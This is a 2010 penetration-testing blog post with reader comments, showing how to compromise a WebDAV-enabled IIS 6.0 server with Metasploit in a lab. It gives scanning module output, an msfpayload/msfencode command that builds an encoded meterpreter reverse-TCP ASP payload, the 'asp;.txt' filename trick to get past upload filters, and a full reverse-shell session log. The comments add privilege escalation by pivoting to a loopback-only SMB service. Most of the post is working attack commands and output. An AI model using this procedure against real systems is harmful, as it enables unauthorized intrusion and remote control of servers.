Monday, May 3, 2010

More with Metasploit and WebDAV


intro..webdav stuff...lazy...

To get yourself a test environment you can follow this tutorial, its not bad. You'll want to make sure you pay attention to the part about allowing your IUSR_WHATEVER account to have have write access or you can set up a windows account to use authentication.

metasploit has a few modules to test for webDAV presence.

webdav_scanner:
msf auxiliary(webdav_scanner) > run

[*] 192.168.242.134 (Microsoft-IIS/6.0) has WEBDAV ENABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
webdav_internal_ip
msf auxiliary(webdav_internal_ip) > run

[*] Found internal IP in WebDAV response (192.168.242.134) 192.168.242.134
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
webdav_website_content
msf auxiliary(webdav_website_content) > run
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/iisstart.htm
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/pagerror.gif
[*] Found file or directory in WebDAV response (192.168.242.134) http://domino/davaroo/
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The important one there is the davaroo directory if someone has shared out the root directory it will usually just look like this:
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/
Or if you have the path wrong
msf auxiliary(webdav_test) > run

[*] 192.168.242.134/DAV/ has DAV DISABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
If we need to see what options are allowed, you can use the http options auxiliary module.
msf auxiliary(options) > run

[*] 192.168.242.134 allows OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK methods
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
to see if you can upload things quickly you can give DAVtest a try or Ryan Linn's webdav_test module.
msf auxiliary(webdav_test) > run

[*] 192.168.242.134/davaroo/ has DAV ENABLED
[*] Attempting to create /davaroo/WebDavTest_111vO5Ats7
[*] 192.168.242.134/davaroo/ is WRITEABLE
[*] Trying /davaroo/WebDavTest_111vO5Ats7/9RiwStjSE7bI4dv.html
[*] Trying /davaroo/WebDavTest_111vO5Ats7/pd84WuxboP6ZvcN.jhtml
[*] Trying /davaroo/WebDavTest_111vO5Ats7/Lqy4HqgiNoqS9YQ.php
[*] Trying /davaroo/WebDavTest_111vO5Ats7/y2QL82GmZvFHv0U.txt
[*] Trying /davaroo/WebDavTest_111vO5Ats7/W2CNVzATLpt9XeU.cgi
[*] Trying /davaroo/WebDavTest_111vO5Ats7/acl1gOJlmSu5fXf.pl
[*] Trying /davaroo/WebDavTest_111vO5Ats7/pKR4pLVcDpcPCnB.jsp
[*] Trying /davaroo/WebDavTest_111vO5Ats7/KWj69GgzXIHrR0j.aspx
[*] Trying /davaroo/WebDavTest_111vO5Ats7/1ImlpmATPINV2Zj.asp
[*] Trying /davaroo/WebDavTest_111vO5Ats7/OT0B3cOEFLgnIGB.shtml
[*] Trying /davaroo/WebDavTest_111vO5Ats7/yGSr7GVoEmjcQCf.cfm
[*] Attempting to cleanup /davaroo/WebDavTest_111vO5Ats7
[*] Uploadable files are: html,jhtml,php,txt,cgi,pl,jsp,aspx,cfm
[*] Executable files are: html,txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
What you'll probably run into here is the INABILITY to upload executable content or anything otherwise useful on the box. in this case i can upload php, cgi, jsp, aspx, but nothing is there to execute any of that content.

If you try to upload an .asp you'll get a 403 forbidden or if you try to COPY/MOVE a .txt to .asp you'll get a forbidden. :-(

Thankfully there is a "feature" of 2k3 that allows you to upload evil.asp;.txt and that will bypass the filter.

So we generate out evil.asp file using msfpayload and msfencode, you could also use any other asp shell too...
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.6.94 LPORT=443 R |
./msfencode -t asp -o tcp443meterp.asp
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
upload it and rename it
dav:/davaroo/> put tcp443meterp.asp tcp443meterp.txt
Uploading tcp443meterp.asp to `/davaroo/tcp443meterp.txt':
Progress: [=============================>] 100.0% of 314810 bytes succeeded.
dav:/davaroo/> copy tcp443meterp.txt tcp443meterp.asp;.txt
Copying `/davaroo/tcp443meterp.txt' to `/davaroo/tcp443meterp.asp%3b.txt': succeeded.
dav:/davaroo/> exit
now you can browse to the page at ip/tcp443meterp.asp;.txt and get your shell
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.6.94:443
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.6.94
[*] Meterpreter session 1 opened (192.168.6.94:443 -> 192.168.242.134:49306)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: 6
meterpreter > sysinfo
Computer: WebDAVRulez
OS : Windows .NET Server (Build 3790, Service Pack 2).
Arch : x86
Language: en_US
meterpreter > run migrate -f notepad.exe
[*] Current server process: svchost.exe (1792)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 312
[*] New server process: notepad.exe (312)
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
What I ran into was that your shell came back with a less than desirable privilege (Network Service). You'll have to work the local angle to elevate but at least you have a shell.

more info here: http://blog.metasploit.com/2009/12/exploiting-microsoft-iis-with.html

Resources:
cadaver: http://www.webdav.org/cadaver/
DAVtest: http://security.sunera.com/2010/04/davtest-quickly-test-exploit-webdav.html
Ryan Linn's port of DAVtest to metasploit: http://trac.happypacket.net/browser/msfmods/trunk/modules/auxiliary/scanner/http/webdav_test.rb
CG

6 comments:

chao-mu said...

Recently I got into a WebDAV server in just this way, although I was able to COPY and didn't need the "feature" (IIS 5.0, Windows XP SP1). PUT the meterpreter payload, then COPY it into the /scripts/ directory, then grab it with a GET. Although, I used curl for interacting with the HTTP server and not metasploit. I love how lightweight curl is.

What is the 'local angle' you mention? That is the part I am struggling with at the moment. I am stuck as IWAM without the ability to elevate privileges. I have identified that a vulnerable version of SMB is running, but it is only accessible through the loopback interface. However, to make matters worse, ports I open up are not available to the outside world, so port forwarding is not option. Do you have any suggestions on where to go from there?

chao-mu said...

Whoops, I mean IIS 5.1.

Also, I noticed that there was an entry in the routing table mapping its IP to 127.0.0.1. I pivoted on that and was able to exploit SMB and get SYSTEM.

Kristian Erik Hermansen said...

So, if the semi-colon trick doesn't work anymore, there is no other way to gain remote access? It appears Windows 2008+ / IIS fixed that trick. Any other workarounds? I attempted NULL bytes, CR/LF, #, ?, URI Double Encoding, all to no avail :(

CG said...

Kristian,

no idea havent had to test it on anything above 2k3 yet.

Anonymous said...

I read your blog and I found that to generate meterpreter asp payload you have used wrong payload instead of reverse_tcp you should have used reverse_http, anyways nice read :)

CG said...

you can use whatever payload you want you just have to generate the asp output for the payload